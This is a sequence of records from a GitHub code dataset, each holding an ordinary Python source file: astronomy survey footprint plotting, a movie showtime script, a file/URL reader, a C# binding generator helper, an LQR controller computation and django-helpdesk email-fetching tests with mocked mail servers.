ra/dec\n res = sqlite_column_search(basedir,\n 
getcolumns=['ra','decl'],\n conditions=conditions,\n lcclist=[collection],\n incoming_userid=1,\n incoming_role='superuser')\n\n if res and len(res[collection]['result']) > 0:\n\n rows = res[collection]['result']\n\n if randomsample is not None:\n rows = results_random_sample(rows, sample_count=randomsample)\n\n if limit is not None:\n rows = results_limit_rows(rows,\n rowlimit=limit,\n incoming_userid=1,\n incoming_role='superuser')\n\n ra = np.array([x['ra'] for x in rows])\n decl = np.array([x['decl'] for x in rows])\n points = np.column_stack((ra, decl))\n\n shapely_concave_hull, edge_points = alpha_shape(points,\n alpha=alpha)\n if hull_buffer is not None:\n shapely_concave_hull = shapely_concave_hull.buffer(hull_buffer)\n\n # get the coordinates of the hull\n try:\n\n hull_coords = np.array(shapely_concave_hull.exterior.coords)\n\n except Exception:\n\n LOGWARNING('this concave hull may have multiple '\n 'unconnected sections, the alpha parameter '\n 'might be too high. returning a shapely.MultiPolygon '\n 'object and list of edge coords')\n hull_coords = []\n\n if isinstance(shapely_concave_hull, MultiPolygon):\n\n for geom in shapely_concave_hull:\n hull_coords.append(np.array(geom.exterior.coords))\n\n elif isinstance(shapely_concave_hull, Polygon):\n\n if (shapely_concave_hull.area > 0.0 and\n shapely_concave_hull.exterior):\n\n hull_coords = np.array(shapely_concave_hull.exterior.coords)\n\n else:\n LOGERROR('the concave hull has area = 0.0, '\n 'alpha = %s is likely too high '\n 'for this object' % alpha)\n return shapely_concave_hull, None\n\n else:\n\n LOGERROR('unknown geometry returned')\n return None, None\n\n return shapely_concave_hull, hull_coords\n\n\n####################################\n## COLLECTION FOOTPRINT FUNCTIONS ##\n####################################\n\ndef generate_collection_footprint(\n basedir,\n collection,\n alpha=0.7,\n randomsample=None,\n limit=None,\n conditions='(ndet > 49)',\n hull_buffer=0.5,\n):\n '''This generates the convex and concave hulls for a collection.\n\n Saves them to a collection-footprint.pkl pickle in the collection's\n directory.\n\n '''\n\n convex_hull, convex_boundary_points = collection_convex_hull(\n basedir,\n collection,\n randomsample=randomsample,\n limit=limit,\n conditions=conditions,\n hull_buffer=hull_buffer,\n )\n concave_hull, concave_boundary_points = collection_alpha_shape(\n basedir,\n collection,\n alpha=alpha,\n randomsample=randomsample,\n limit=limit,\n conditions=conditions,\n hull_buffer=hull_buffer,\n )\n\n footprint = {\n 'collection': collection,\n 'args':{\n 'alpha':alpha,\n 'randomsample':randomsample,\n 'limit':limit,\n 'conditions':conditions,\n 'hull_buffer':hull_buffer\n },\n 'convex_hull': convex_hull,\n 'convex_hull_boundary': convex_boundary_points,\n 'concave_hull': concave_hull,\n 'concave_hull_boundary': concave_boundary_points,\n }\n\n outpickle = os.path.join(basedir,\n collection.replace('_','-'),\n 'catalog-footprint.pkl')\n\n with open(outpickle, 'wb') as outfd:\n pickle.dump(footprint, outfd, pickle.HIGHEST_PROTOCOL)\n\n return outpickle\n\n\n#####################################\n## COLLECTION OVERVIEW PLOT MAKING ##\n#####################################\n\ndef collection_overview_plot(collection_dirlist,\n outfile,\n use_hull='concave',\n use_projection='mollweide',\n use_colormap='inferno',\n use_colorlist=None,\n use_alpha=0.5,\n show_galactic_plane=True,\n show_ecliptic_plane=True,\n east_is_left=True,\n dpi=200):\n '''This generates a coverage map plot for all of the collections 
in\n collection_dirlist.\n\n Writes to outfile. This should probably go into the basedir docs/static\n directory.\n\n Gets the hulls from the catalog-footprint.pkl files in each collection's\n directory.\n\n '''\n\n if isinstance(use_colorlist, (list, tuple)):\n if len(use_colorlist) != len(collection_dirlist):\n LOGERROR(\"the color list provided must have the same \"\n \"length as the collection_dirlist\")\n return None\n\n # label sizes\n matplotlib.rcParams['xtick.labelsize'] = 16.0\n matplotlib.rcParams['ytick.labelsize'] = 16.0\n\n # fonts for the entire thing\n matplotlib.rcParams['font.size'] = 16\n\n # lines\n matplotlib.rcParams['lines.linewidth'] = 2.0\n\n # axes\n matplotlib.rcParams['axes.linewidth'] = 2.0\n matplotlib.rcParams['axes.labelsize'] = 14.0\n\n # xtick setup\n matplotlib.rcParams['xtick.major.size'] = 10.0\n matplotlib.rcParams['xtick.minor.size'] = 5.0\n matplotlib.rcParams['xtick.major.width'] = 1.0\n matplotlib.rcParams['xtick.minor.width'] = 1.0\n matplotlib.rcParams['xtick.major.pad'] = 8.0\n\n # ytick setup\n matplotlib.rcParams['ytick.major.size'] = 10.0\n matplotlib.rcParams['ytick.minor.size'] = 5.0\n matplotlib.rcParams['ytick.major.width'] = 1.0\n matplotlib.rcParams['ytick.minor.width'] = 1.0\n matplotlib.rcParams['ytick.major.pad'] = 8.0\n\n # svg font setup\n plt.rcParams['svg.fonttype'] = 'none'\n\n fig = plt.figure(figsize=(14,12))\n\n ax = fig.add_subplot(111, projection=use_projection)\n ax.set_facecolor('#e2e3e5')\n\n if show_galactic_plane:\n\n LOGINFO('plotting the Galactic plane')\n\n galactic_plane = SkyCoord(\n np.arange(0,360.0,0.25),0.0,frame='galactic',unit='deg'\n ).icrs\n galactic_plane_ra = np.array([x.ra.value for x in galactic_plane])\n galactic_plane_decl = np.array([x.dec.value for x in galactic_plane])\n galra = galactic_plane_ra[::]\n galdec = galactic_plane_decl[::]\n galra[galra > 180.0] = galra[galra > 180.0] - 360.0\n\n if east_is_left:\n galra = -galra\n\n ax.scatter(\n np.radians(galra),\n np.radians(galdec),\n s=25,\n color='#ffc107',\n marker='o',\n zorder=-99,\n label='Galactic plane',\n rasterized=True\n )\n\n if show_ecliptic_plane:\n\n LOGINFO('plotting the ecliptic plane')\n\n # ecliptic plane\n ecliptic_equator = SkyCoord(\n np.arange(0,360.0,0.25),\n 0.0,\n frame='geocentrictrueecliptic',unit='deg'\n ).icrs\n\n ecliptic_equator_ra = np.array(\n [x.ra.value for x in ecliptic_equator]\n )\n ecliptic_equator_decl = np.array(\n [x.dec.value for x in ecliptic_equator]\n )\n\n eclra = ecliptic_equator_ra[::]\n ecldec = ecliptic_equator_decl[::]\n eclra[eclra > 180.0] = eclra[eclra > 180.0] - 360.0\n\n if east_is_left:\n eclra = -eclra\n\n ax.scatter(\n np.radians(eclra),\n np.radians(ecldec),\n s=25,\n color='#6c757d',\n marker='o',\n zorder=-80,\n label='Ecliptic plane',\n rasterized=True\n )\n\n #\n # now, we'll go through each collection\n #\n\n collection_labels = {}\n\n for ci, cdir in enumerate(collection_dirlist):\n\n LOGINFO('plotting footprint for collection: %s' % cdir.replace('-','_'))\n\n footprint_pkl = os.path.join(cdir, 'catalog-footprint.pkl')\n with open(footprint_pkl,'rb') as infd:\n footprint = pickle.load(infd)\n\n hull_boundary = footprint['%s_hull_boundary' % use_hull]\n hull = footprint['%s_hull' % use_hull]\n\n if isinstance(hull_boundary, np.ndarray):\n\n covras = hull_boundary[:,0]\n covdecls = hull_boundary[:,1]\n # wrap the RAs\n covras[covras > 180.0] = covras[covras > 180.0] - 360.0\n\n if east_is_left:\n covras = -covras\n\n if isinstance(use_colorlist, (list, tuple)):\n\n ax.fill(\n 
np.radians(covras),\n np.radians(covdecls),\n linewidth=0.0,\n color=use_colorlist[ci],\n alpha=use_alpha,\n rasterized=True,\n gid=\"patch-collection-%s-part-%s\" % (\n footprint['collection'],\n 0\n )\n )\n\n else:\n ax.fill(\n np.radians(covras),\n np.radians(covdecls),\n linewidth=0.0,\n color=plt.get_cmap(use_colormap)(\n 1.0 * ci/len(collection_dirlist)\n ),\n alpha=use_alpha,\n rasterized=True,\n gid=\"patch-collection-%s-part-%s\" % (\n footprint['collection'],\n 0\n )\n )\n\n collection_label = ax.text(\n np.radians(np.mean(covras)),\n np.radians(np.mean(covdecls)),\n footprint['collection'],\n fontsize=13,\n ha='center',\n va='center',\n zorder=100,\n # color='#b8daff',\n color='white',\n url='#fp-collection/%s' % footprint['collection'],\n gid=\"label-collection-%s\" % footprint['collection'],\n )\n # add an outline to the label so it's visible against any background\n # https://matplotlib.org/users/patheffects_guide.html\n collection_label.set_path_effects(\n [path_effects.Stroke(linewidth=3, foreground='black'),\n path_effects.Normal()]\n )\n collection_labels[footprint['collection']] = {\n 'label':collection_label,\n 'collection_dir':os.path.abspath(cdir)\n }\n\n # if we have an non-contiguous collection\n elif isinstance(hull_boundary, list):\n\n LOGWARNING('this collection is not contiguous')\n\n part_center_ras, part_center_decls, part_areas = [], [], []\n\n for partind, part, bound in zip(range(len(hull)),\n hull,\n hull_boundary):\n\n covras = bound[:,0]\n covdecls = bound[:,1]\n # wrap the RAs\n covras[covras > 180.0] = covras[covras > 180.0] - 360.0\n\n if east_is_left:\n covras = -covras\n\n if isinstance(use_colorlist, (list, tuple)):\n\n ax.fill(\n np.radians(covras),\n np.radians(covdecls),\n linewidth=0.0,\n color=use_colorlist[ci],\n alpha=use_alpha,\n rasterized=True,\n gid=\"patch-collection-%s-part-%s\" % (\n footprint['collection'],\n partind\n )\n )\n\n else:\n ax.fill(\n np.radians(covras),\n np.radians(covdecls),\n linewidth=0.0,\n color=plt.get_cmap(use_colormap)(\n 1.0 * ci/len(collection_dirlist)\n ),\n alpha=use_alpha,\n rasterized=True,\n gid=\"patch-collection-%s-part-%s\" % (\n footprint['collection'],\n partind\n )\n )\n\n part_center_ras.append(np.mean(covras))\n part_center_decls.append(np.mean(covdecls))\n part_areas.append(part.area)\n\n # since the collection is not contiguous, we'll move its label from\n # the center of the collection to a weighted center calculated by\n # weighting the area of the separate parts\n\n # we weight by an exponent to push more strongly towards larger\n # parts of the collection.\n collection_label_ra = np.average(\n part_center_ras,\n weights=np.array(part_areas)**2.5\n )\n collection_label_decl = np.average(\n part_center_decls,\n weights=np.array(part_areas)**2.5\n )\n\n collection_label = ax.text(\n np.radians(collection_label_ra),\n np.radians(collection_label_decl),\n footprint['collection'],\n fontsize=13,\n ha='center',\n va='center',\n zorder=100,\n color='white',\n # color='#b8daff',\n url='#fp-collection/%s' % footprint['collection'],\n gid=\"label-collection-%s\" % footprint['collection'],\n )\n # add an outline to the label so it's visible against any background\n # https://matplotlib.org/users/patheffects_guide.html\n collection_label.set_path_effects(\n [path_effects.Stroke(linewidth=3, foreground='black'),\n path_effects.Normal()]\n )\n collection_labels[footprint['collection']] = {\n 'label':collection_label,\n 'collection_dir':os.path.abspath(cdir)\n }\n\n # make the grid and the ticks\n 
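# (the RA hour labels paired with the tick positions below are reversed when\n    # east_is_left is set, so that east points left as it does on the sky)\n    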
ax.grid()\n xt = [np.radians(x) for x in\n [-150.0,-120.0,-90.0,-60.0,-30.0,0.0,30,60,90,120,150.0]]\n xtl = [r'$14^{\\mathrm{h}}$',r'$16^{\\mathrm{h}}$',\n r'$18^{\\mathrm{h}}$',r'$20^{\\mathrm{h}}$',\n r'$22^{\\mathrm{h}}$',r'$0^{\\mathrm{h}}$',\n r'$2^{\\mathrm{h}}$',r'$4^{\\mathrm{h}}$',\n r'$6^{\\mathrm{h}}$',r'$8^{\\mathrm{h}}$',\n r'$10^{\\mathrm{h}}$']\n ax.set_xticks(xt)\n\n if east_is_left:\n xtl = list(reversed(xtl))\n\n ax.set_xticklabels(xtl)\n\n # make the axis labels\n ax.set_xlabel('right ascension [hr]')\n ax.set_ylabel('declination [deg]')\n\n # make the legend\n ax.legend(\n loc='upper right',\n bbox_to_anchor=(1.0, 1.05),\n fontsize=13,\n numpoints=1,\n scatterpoints=1,\n markerscale=3.0,\n ncol=1,\n frameon=False\n )\n\n #\n # make the compass\n #\n\n # north arrow\n plt.arrow(0.165,0.260,0.0,0.03,\n transform=plt.gcf().transFigure,\n color='k',\n clip_on=False)\n\n if east_is_left:\n\n # east arrow\n plt.arrow(0.165,0.260,-0.03,0.00,\n transform=plt.gcf().transFigure,\n color='k',\n clip_on=False)\n\n else:\n\n # east arrow\n plt.arrow(0.165,0.260,0.03,0.00,\n transform=plt.gcf().transFigure,\n color='k',\n clip_on=False)\n\n # north text\n plt.text(0.165,0.295,'North',\n transform=plt.gcf().transFigure,\n fontsize=14,\n color='k',\n ha='center',\n va='bottom',\n clip_on=False)\n\n # east text\n if east_is_left:\n\n plt.text(0.128,0.260,'East',\n transform=plt.gcf().transFigure,\n fontsize=14,\n va='center',\n ha='right',\n color='k',\n clip_on=False)\n\n else:\n\n plt.text(0.197,0.260,'East',\n transform=plt.gcf().transFigure,\n fontsize=14,\n va='center',\n ha='left',\n color='k',\n clip_on=False)\n\n #\n # save the plot to the designated file\n #\n fig.savefig(outfile,\n bbox_inches='tight',\n dpi=dpi,\n transparent=False)\n\n plt.close('all')\n return outfile, collection_labels\n\n\ndef collection_overview_svg(\n basedir,\n collection_dirlist,\n use_hull='concave',\n use_projection='mollweide',\n use_colorlist=None,\n use_colormap='inferno',\n use_alpha=0.5,\n show_galactic_plane=True,\n show_ecliptic_plane=True,\n east_is_left=True,\n dpi=200,\n optimize_svg=True\n):\n '''This generates a coverage map plot for all of the collections in\n collection_dirlist.\n\n This version just calls collection_overview_plot with the file type set to\n SVG and outputs to a file called collection-footprints.svg in the\n LCC-Server's basedir/docs/static directory.\n\n '''\n\n outfile = os.path.join(basedir,\n 'docs',\n 'static',\n 'collection-footprints-temp.svg')\n\n outfile, labels = collection_overview_plot(\n collection_dirlist,\n outfile,\n use_hull=use_hull,\n use_projection=use_projection,\n use_colorlist=use_colorlist,\n use_colormap=use_colormap,\n use_alpha=use_alpha,\n show_galactic_plane=show_galactic_plane,\n show_ecliptic_plane=show_ecliptic_plane,\n east_is_left=east_is_left,\n dpi=dpi\n )\n\n if optimize_svg:\n ret = subprocess.run('scour -i %s -o %s' %\n (outfile, outfile.replace('-temp','')),\n shell=True)\n LOGINFO('Optimized footprint SVG -> %s' % outfile.replace('-temp',''))\n if ret.returncode == 0:\n os.remove(outfile)\n else:\n shutil.move(outfile, outfile.replace('-temp',''))\n LOGERROR('Could not optimize the footprint SVG. 
Left as is: %s' %\n outfile.replace('-temp',''))\n","repo_name":"waqasbhatti/lcc-server","sub_path":"lccserver/backend/footprints.py","file_name":"footprints.py","file_ext":"py","file_size_in_byte":25360,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"36394625911","text":"import sys\n\ncurrent_movies = {\n 'The Grinch': ['11:00am', \"2:00pm\", \"4:15pm\", \"7:45pm\"],\n 'Hardball': ['11:00am', \"2:00pm\", \"6:15pm\", \"7:45pm\"],\n 'Sharknado': ['9:00am', \"12:00pm\", \"4:30pm\", \"7:45pm\"],\n 'Sharkboy and Lavagirl': ['10:20am', \"2:00pm\", \"4:15pm\", \"7:45pm\"]\n}\n\nall_movies = {\n \"expiredMovies\": [\n {\"name\": \"Jurassic Park\", \"rating\": \"pg13\"},\n {\"name\": \"Johnny Cash\", \"rating\": \"pg\"}\n ],\n \"currentMovies\": [\n { \"name\": 'When Harry Met Sally',\n \"rating\": \"pg13\",\n \"showtimes\": ['11:00am', \"2:00pm\"],\n \"freePopcorn\": \"no\"\n },\n { \"name\": 'Terminator',\n \"rating\": \"pg13\",\n \"showtimes\": ['11:00am', \"2:00pm\"],\n \"freePopcorn\": \"yes\"\n },\n {\n \"name\": \"The Martian\",\n \"rating\": \"pg\",\n \"showtimes\": ['11:00am', \"2:00pm\"],\n \"freePopcorn\": \"yes\"\n },\n {\n \"name\": \"Battlefarce\",\n \"rating\": \"R\",\n \"showtimes\": ['11:00am', \"2:00pm\"],\n \"freePopcorn\": \"no\"\n }\n ]\n}\n\n\nprint(\"Please choose an option:\")\nprint(\"enter [t] to see all movie titles currently playing\")\nprint(\"enter [a] to view all movie titles and their showtimes\")\nprint(\"enter [s] to search for a movie title\")\nprint(\"enter [p] to view free popcorn movie offers\")\nmenuChoice = input().lower()\n\n\n\n\nif menuChoice == \"t\":\n print(\"\\033c\")\n print(\"Current movies available: \")\n for movie in current_movies:\n print(\" \", movie)\n print(\"------\")\n user_movieInput = input(\"What movie would you like showtimes for? \\n\")\nelif menuChoice == \"s\":\n user_movieInput = input(\"What movie would you like showtimes for? 
\\n\")\nelif menuChoice == \"a\":\n print(\"\\033c\")\n print(\"Current movie showtimes: \")\n for movie in current_movies:\n print(\" \", movie)\n for time in current_movies.get(movie):\n print(\" -- \", \"playing at: \", time)\n print()\nelif menuChoice == \"p\":\n print(\"\\033c\")\n for movie in all_movies[\"currentMovies\"]:\n if (movie[\"freePopcorn\"] == \"yes\"):\n print(movie[\"name\"])\n input()\nelse:\n print(\"invalid entry -- exiting program\")\n sys.exit()\n \n\nuser_movieInput = user_movieInput.title()\nshowtime = current_movies.get(user_movieInput)\nprint()\nif user_movieInput in current_movies:\n if showtime == None:\n print(user_movieInput, \"is not playing today\")\n else:\n print(user_movieInput, \"is playing today at:\")\n for time in showtime:\n print(\" \", time)\nelse:\n print(\"movie not found\", user_movieInput)","repo_name":"ember-parr/python-intro","sub_path":"movieSchedule.py","file_name":"movieSchedule.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43590698616","text":"import urllib2\nimport os\n\nURL_PREFIXES = (\"http://\", \"https://\", \"ftp://\")\n\ndef readFile( filestr ):\n contentstr = None\n if filestr.startswith(URL_PREFIXES):\n contentstr = readFromURL(filestr)\n else:\n contentstr = readFromLocalFile(filestr)\n return contentstr\n\ndef readFromLocalFile( filename ):\n readstr = None\n filename = os.path.expanduser( filename )\n with open(filename, 'r') as f:\n readstr = f.read()\n return readstr\n\ndef readFromURL( url ):\n readstr = None\n u = urllib2.urlopen(url) \n readstr = u.read()\n return readstr\n \n","repo_name":"fabric-testbed/MeasurementFramework","sub_path":"instrumentize/geni/OMNI_docker/geni-tools-2.11/src/gcf/omnilib/util/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"35087692002","text":"import os\nimport sys\n\nsys.path.append(os.path.split(os.getcwd())[0])\nimport common\n\nclass CSharpDevice(common.Device):\n def get_csharp_class_name(self):\n return self.get_camel_case_category() + self.get_camel_case_name()\n\nclass CSharpPacket(common.Packet):\n def get_csharp_parameter_list(self, use_out_params=True):\n param = []\n\n for element in self.get_elements():\n if (not use_out_params) and element.get_direction() == 'out':\n continue\n\n out = ''\n if element.get_direction() == 'out' and self.get_type() == 'function':\n out = 'out '\n\n csharp_type = element.get_csharp_type()\n name = element.get_headless_camel_case_name()\n\n param.append('{0}{1} {2}'.format(out, csharp_type, name))\n\n return ', '.join(param)\n\n def get_csharp_method_signature(self, print_full_name=False, is_doc=False):\n sig_format = \"public {4}{0} {1}{2}({3})\"\n ret_count = len(self.get_elements('out'))\n params = self.get_csharp_parameter_list(ret_count > 1)\n return_type = 'void'\n\n if ret_count == 1:\n return_type = self.get_elements('out')[0].get_csharp_type()\n\n class_prefix = ''\n\n if print_full_name:\n class_prefix = self.get_device().get_csharp_class_name() + '::'\n\n override = ''\n\n if not is_doc and self.has_prototype_in_device():\n override = 'override '\n\n return sig_format.format(return_type, class_prefix, self.get_camel_case_name(), params, override)\n\ncsharp_types = {\n 'int8': 'short',\n 'uint8': 'byte',\n 'int16': 'short',\n 'uint16': 'int',\n 'int32': 'int',\n 'uint32': 'long',\n 'int64': 
'long',\n 'uint64': 'long',\n 'float': 'float',\n 'bool': 'bool',\n 'char': 'char',\n 'string': 'string'\n}\n\ndef get_csharp_type(type, cardinality):\n t = csharp_types[type]\n\n if cardinality > 1 and type != 'string':\n t += '[]'\n\n return t\n\nclass CSharpElement(common.Element):\n csharp_le_converter_types = {\n 'int8': 'byte',\n 'uint8': 'byte',\n 'int16': 'short',\n 'uint16': 'short',\n 'int32': 'int',\n 'uint32': 'int',\n 'int64': 'long',\n 'uint64': 'long',\n 'float': 'float',\n 'bool': 'bool',\n 'char': 'char',\n 'string': 'string'\n }\n\n csharp_le_converter_from_methods = {\n 'int8': 'SByteFrom',\n 'uint8': 'ByteFrom',\n 'int16': 'ShortFrom',\n 'uint16': 'UShortFrom',\n 'int32': 'IntFrom',\n 'uint32': 'UIntFrom',\n 'int64': 'LongFrom',\n 'uint64': 'ULongFrom',\n 'float': 'FloatFrom',\n 'bool': 'BoolFrom',\n 'char': 'CharFrom',\n 'string': 'StringFrom'\n }\n\n def get_csharp_type(self):\n return get_csharp_type(self.get_type(), self.get_cardinality())\n\n def get_csharp_le_converter_type(self):\n t = CSharpElement.csharp_le_converter_types[self.get_type()]\n\n if self.get_cardinality() > 1 and self.get_type() != 'string':\n t += '[]'\n\n return t\n\n def get_csharp_le_converter_from_method(self):\n m = CSharpElement.csharp_le_converter_from_methods[self.get_type()]\n\n if m != 'StringFrom' and self.get_cardinality() > 1:\n m = m.replace('From', 'ArrayFrom')\n\n return m\n","repo_name":"ppacher/generators","sub_path":"csharp/csharp_common.py","file_name":"csharp_common.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"36673772678","text":"\"\"\"Script to compute LQR-controller gain for stabilizing the 2D N Ball Balancer, based on numerical parameter values.\n\"\"\"\nimport context\n\nimport numpy as np\nfrom scipy.linalg import solve_continuous_are\nimport matplotlib.pyplot as plt\n\nimport pickle\n\nfrom symbolic_dynamics_n import ang, omega, omega_dot, omega_cmd, all_constants\nfrom model_2d.param import getDefaultParam\n\n\ndef computeControllerGains(N: int, verbose: bool = False):\n\n dyn_lin = pickle.load(open(f\"linear_dynamics_{N}.p\", \"rb\"))\n\n dyn_lin = dyn_lin.subs(getDefaultParam(N))\n\n assert(dyn_lin.jacobian(all_constants).is_zero_matrix)\n\n # extract matrices such that M*x_ddot + D*x_dot + K*x = Bd*u\n M = dyn_lin.jacobian(omega_dot)\n D = dyn_lin.jacobian(omega)\n K = dyn_lin.jacobian(ang)\n Bd = dyn_lin.diff(omega_cmd)\n\n # convert to first order x_ddot = A*x + B*u\n dim = dyn_lin.shape[0]\n\n A = np.zeros([2 * dim, 2 * dim], dtype=float)\n\n A[:dim, dim:] = np.eye(dim)\n A[dim:, :dim] = np.array(-M.LUsolve(K))\n A[dim:, dim:] = np.array(-M.LUsolve(D))\n\n B = np.zeros([2 * dim, 1], dtype=float)\n\n B[dim:, :] = np.array(-M.LUsolve(Bd))\n\n # check controlability matrix\n X = [B]\n for _ in range(dim - 1):\n X.append(np.dot(A, X[-1]))\n\n X = np.column_stack(X)\n\n assert(np.linalg.matrix_rank(X) == dim)\n\n # eigenvalues\n if verbose:\n print('open loop eigenvalues: \\n{}'.format(np.linalg.eigvals(A)))\n\n # LQR controller:\n # https://en.wikipedia.org/wiki/Linear%E2%80%93quadratic_regulator\n R = np.ones([1, 1], dtype=float) * 1\n # not punishing alpha_N deviations will stabilize the system at an arbitrary alpha_N\n # state: alpha_N-1, phi, psi_0, ..., psi_N, alpha_N-1_dot, phi_dot, psi_0_dot, ... 
, psi_N-1_dot\n Q = np.diag(np.concatenate([np.zeros(N + 1), np.array([4, 8]), np.array([4 * (2**x) for x in range(N - 1)])]))\n\n # solve continuous Riccati equation\n P = solve_continuous_are(A, B, Q, R)\n\n # compute controller gain\n K = np.dot(np.linalg.inv(R), np.dot(B.T, P))\n\n if verbose:\n # compute eigenvalues of closed loop system\n eig = np.linalg.eigvals(A - np.dot(B, K))\n print('closed loop eigenvalues: \\n{}'.format(eig))\n\n # find minimal damping coefficient\n zeta = [np.absolute(e.real) / np.absolute(e) for e in eig if e < 0]\n print('minimal damping ratio: {}'.format(min(zeta)))\n\n return K, eig\n\n\nif __name__ == '__main__':\n\n K, eig = computeControllerGains(2, True)\n\n plt.figure()\n plt.plot(eig.real, eig.imag, 'b*')\n plt.xlabel('real')\n plt.ylabel('imag')\n plt.title('poles of closed loop system')\n plt.axis('equal')\n plt.show(block=True)\n","repo_name":"ChristofDubs/DoubleBallBalancer","sub_path":"model_2d/scripts/lqr_controller_n.py","file_name":"lqr_controller_n.py","file_ext":"py","file_size_in_byte":2685,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"620444934","text":"from helpdesk.models import Queue, Ticket\nfrom django.test import TestCase\nfrom django.core.management import call_command\nfrom django.utils import six\nfrom django.shortcuts import get_object_or_404\nimport itertools\nfrom shutil import rmtree\nimport sys\nfrom tempfile import mkdtemp\n\ntry: # python 3\n from urllib.parse import urlparse\nexcept ImportError: # python 2\n from urlparse import urlparse\n\ntry:\n # Python >= 3.3\n from unittest import mock\nexcept ImportError:\n # Python < 3.3\n import mock\n\n# class A addresses can't have first octet of 0\nunrouted_socks_server = \"0.0.0.1\"\nunrouted_email_server = \"0.0.0.1\"\n# the last user port, reserved by IANA\nunused_port = \"49151\"\n\n\nclass GetEmailCommonTests(TestCase):\n\n # tests correct syntax for command line option\n def test_get_email_quiet_option(self):\n \"\"\"Test quiet option is properly propagated\"\"\"\n with mock.patch('helpdesk.management.commands.get_email.process_email') as mocked_processemail:\n call_command('get_email', quiet=True)\n mocked_processemail.assert_called_with(quiet=True)\n call_command('get_email')\n mocked_processemail.assert_called_with(quiet=False)\n\n\nclass GetEmailParametricTemplate(object):\n \"\"\"TestCase that checks email functionality accross methods and socks configs.\"\"\"\n\n def setUp(self):\n\n self.temp_logdir = mkdtemp()\n kwargs = {\n \"title\": 'Queue 1',\n \"slug\": 'QQ',\n \"allow_public_submission\": True,\n \"allow_email_submission\": True,\n \"email_box_type\": self.method,\n \"logging_dir\": self.temp_logdir,\n \"logging_type\": 'none'}\n\n if self.method == 'local':\n kwargs[\"email_box_local_dir\"] = '/var/lib/mail/helpdesk/'\n else:\n kwargs[\"email_box_host\"] = unrouted_email_server\n kwargs[\"email_box_port\"] = unused_port\n\n if self.socks:\n kwargs[\"socks_proxy_type\"] = self.socks\n kwargs[\"socks_proxy_host\"] = unrouted_socks_server\n kwargs[\"socks_proxy_port\"] = unused_port\n\n self.queue_public = Queue.objects.create(**kwargs)\n\n def tearDown(self):\n\n rmtree(self.temp_logdir)\n\n def test_read_email(self):\n \"\"\"Tests reading emails from a queue and creating tickets.\n For each email source supported, we mock the backend to provide\n authenticly formatted responses containing our test data.\"\"\"\n test_email = \"To: update.public@example.com\\nFrom: comment@example.com\\nSubject: 
Some Comment\\n\\nThis is the helpdesk comment via email.\"\n test_mail_len = len(test_email)\n\n if self.socks:\n from socks import ProxyConnectionError\n with self.assertRaisesRegexp(ProxyConnectionError, '%s:%s' % (unrouted_socks_server, unused_port)):\n call_command('get_email')\n\n else:\n # Test local email reading\n if self.method == 'local':\n with mock.patch('helpdesk.management.commands.get_email.listdir') as mocked_listdir, \\\n mock.patch('helpdesk.management.commands.get_email.isfile') as mocked_isfile, \\\n mock.patch('builtins.open' if six.PY3 else '__builtin__.open', mock.mock_open(read_data=test_email)):\n mocked_isfile.return_value = True\n mocked_listdir.return_value = ['filename1', 'filename2']\n\n call_command('get_email')\n\n mocked_listdir.assert_called_with('/var/lib/mail/helpdesk/')\n mocked_isfile.assert_any_call('/var/lib/mail/helpdesk/filename1')\n mocked_isfile.assert_any_call('/var/lib/mail/helpdesk/filename2')\n\n elif self.method == 'pop3':\n # mock poplib.POP3's list and retr methods to provide responses as per RFC 1939\n pop3_emails = {\n '1': (\"+OK\", test_email.split('\\n')),\n '2': (\"+OK\", test_email.split('\\n')),\n }\n pop3_mail_list = (\"+OK 2 messages\", (\"1 %d\" % test_mail_len, \"2 %d\" % test_mail_len))\n mocked_poplib_server = mock.Mock()\n mocked_poplib_server.list = mock.Mock(return_value=pop3_mail_list)\n mocked_poplib_server.retr = mock.Mock(side_effect=lambda x: pop3_emails[x])\n with mock.patch('helpdesk.management.commands.get_email.poplib', autospec=True) as mocked_poplib:\n mocked_poplib.POP3 = mock.Mock(return_value=mocked_poplib_server)\n call_command('get_email')\n\n elif self.method == 'imap':\n # mock imaplib.IMAP4's search and fetch methods with responses from RFC 3501\n imap_emails = {\n \"1\": (\"OK\", ((\"1\", test_email),)),\n \"2\": (\"OK\", ((\"2\", test_email),)),\n }\n imap_mail_list = (\"OK\", (\"1 2\",))\n mocked_imaplib_server = mock.Mock()\n mocked_imaplib_server.search = mock.Mock(return_value=imap_mail_list)\n\n # we ignore the second arg as the data item/mime-part is constant (RFC822)\n mocked_imaplib_server.fetch = mock.Mock(side_effect=lambda x, _: imap_emails[x])\n with mock.patch('helpdesk.management.commands.get_email.imaplib', autospec=True) as mocked_imaplib:\n mocked_imaplib.IMAP4 = mock.Mock(return_value=mocked_imaplib_server)\n call_command('get_email')\n\n ticket1 = get_object_or_404(Ticket, pk=1)\n self.assertEqual(ticket1.ticket_for_url, \"QQ-%s\" % ticket1.id)\n self.assertEqual(ticket1.description, \"This is the helpdesk comment via email.\")\n\n ticket2 = get_object_or_404(Ticket, pk=2)\n self.assertEqual(ticket2.ticket_for_url, \"QQ-%s\" % ticket2.id)\n self.assertEqual(ticket2.description, \"This is the helpdesk comment via email.\")\n\n\n# build matrix of test cases\ncase_methods = [c[0] for c in Queue._meta.get_field('email_box_type').choices]\ncase_socks = [False] + [c[0] for c in Queue._meta.get_field('socks_proxy_type').choices]\ncase_matrix = list(itertools.product(case_methods, case_socks))\n\n# Populate TestCases from the matrix of parameters\nthismodule = sys.modules[__name__]\nfor method, socks in case_matrix:\n\n if method == \"local\" and socks:\n continue\n\n socks_str = \"Nosocks\"\n if socks:\n socks_str = socks.capitalize()\n test_name = str(\n \"TestGetEmail%s%s\" % (method.capitalize(), socks_str))\n\n cl = type(test_name, (GetEmailParametricTemplate, TestCase,), {\n \"method\": method,\n \"socks\": socks})\n setattr(thismodule, test_name, 
